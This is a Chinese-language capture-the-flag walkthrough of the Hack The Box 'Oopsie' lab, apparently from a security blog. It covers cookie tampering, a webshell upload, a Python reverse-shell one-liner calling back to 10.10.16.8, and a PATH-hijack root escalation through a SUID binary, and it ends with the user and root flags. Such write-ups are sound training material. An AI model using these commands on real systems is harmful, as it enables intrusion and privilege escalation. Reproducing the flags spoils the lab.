[StartingPoint][Tier2]Oopsie

2024-04-19 909 0

Task 1

With what kind of tool can intercept web traffic?

(哪种工具可以拦截web数据包)

proxy

Task 2

What is the path to the directory on the webserver that returns a login page?

(路径到返回登录页面的 Web 服务器目录是什么?)

[StartingPoint][Tier2]Oopsie插图

/cdn-cgi/login

Task 3

What can be modified in Firefox to get access to the upload page?

(在 Firefox 中进行修改什么字段可以访问上传页面?)

cookie

Task 4

What is the access ID of the admin user?

(管理员的访问ID是多少?)

[StartingPoint][Tier2]Oopsie插图1

水平越权

[StartingPoint][Tier2]Oopsie插图2

34322

Task 5

On uploading a file, what directory does that file appear in on the server?

(上传文件后,该文件在服务器上出现在哪个目录?)

存在一个上传页面

[StartingPoint][Tier2]Oopsie插图3

上传一个正常图片,但是没有给路径。猜解上传路径

[StartingPoint][Tier2]Oopsie插图4

[StartingPoint][Tier2]Oopsie插图5

/uploads

Task 6

What is the file that contains the password that is shared with the robert user?

(包含与 robert 用户共享的密码的文件是什么?)

db.php

Task 7

What executible is run with the option "-group bugtracker" to identify all files owned by the bugtracker group?

(使用选项"-group bugtracker"运行的可执行文件用于识别所有由bugtracker组拥有的文件。)

find

Task 8

Regardless of which user starts running the bugtracker executable, what's user privileges will use to run?

(无论哪个用户启动运行 bugtracker 可执行文件,它将使用哪个用户权限来运行?)

[StartingPoint][Tier2]Oopsie插图6

root

Task 9

What SUID stands for?

(SUID代表什么)

这个文件上设置了SUID

[StartingPoint][Tier2]Oopsie插图7

Set owner User ID

Task 10

What is the name of the executable being called in an insecure manner?

(bugtracker中哪个参数确认为不安全)

cat

必要步骤

方法A:一句话木马+python反弹shell

上传之后最好在uploads目录下新建一个xxx文件夹,将webshell放在这个xxx文件夹中,避免webshell被程序删除

[StartingPoint][Tier2]Oopsie插图8

[StartingPoint][Tier2]Oopsie插图9

用python来反弹shell

$ python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.16.8",10032)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/bash", "-i"])'

注意了,一定一定要把webshell放到文件夹里面,这样才会稳定不被删

[StartingPoint][Tier2]Oopsie插图10

由于还不是交互式的shell,所以要用

$ SHELL=/bin/bash script -q /dev/null

[StartingPoint][Tier2]Oopsie插图11

方法B:一句话木马+SSH直接连接robert

[StartingPoint][Tier2]Oopsie插图12

提权

[StartingPoint][Tier2]Oopsie插图13

[StartingPoint][Tier2]Oopsie插图14

/usr/bin/bugtracker 可执行文件拥有 SUID 权限位。SUID (Set User ID) 权限是一种特殊的权限,允许用户在执行该文件时以文件所有者的权限而不是当前用户的权限来执行。因此,当用户 robert 执行 bugtracker 可执行文件时,该文件会以 bugtracker 组的权限来执行,而不是 robert 用户的权限。

此外bugtracker 组对于 /usr/bin/bugtracker 文件具有执行权限,并且该文件以 root 用户的权限执行。因此,当 robert 用户执行该文件时,他会以 root 用户的权限执行该文件。

[StartingPoint][Tier2]Oopsie插图15

当前路径变量

[StartingPoint][Tier2]Oopsie插图16

将环境变量设置到tmp目录,也就意味着执行任意程序时,当前shell优先从tmp目录找命令

robert@oopsie:/$ export PATH=/tmp:$PATH

robert@oopsie:/$ cd /tmp

robert@oopsie:/tmp$ echo '/bin/bash' > cat

root身份执行cat命令并且执行/bin/bash

robert@oopsie:/tmp$ chmod +x cat

[StartingPoint][Tier2]Oopsie插图17

再次执行 /usr/bin/bugtracker

[StartingPoint][Tier2]Oopsie插图18

Users Flag

$ cat /home/robert/user.txt

[StartingPoint][Tier2]Oopsie插图19

f2c74ee8db7983851ab2a96a44eb7981

Root Flag

[StartingPoint][Tier2]Oopsie插图20

af13b0bee69f8a877c3faf667f7beacf


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论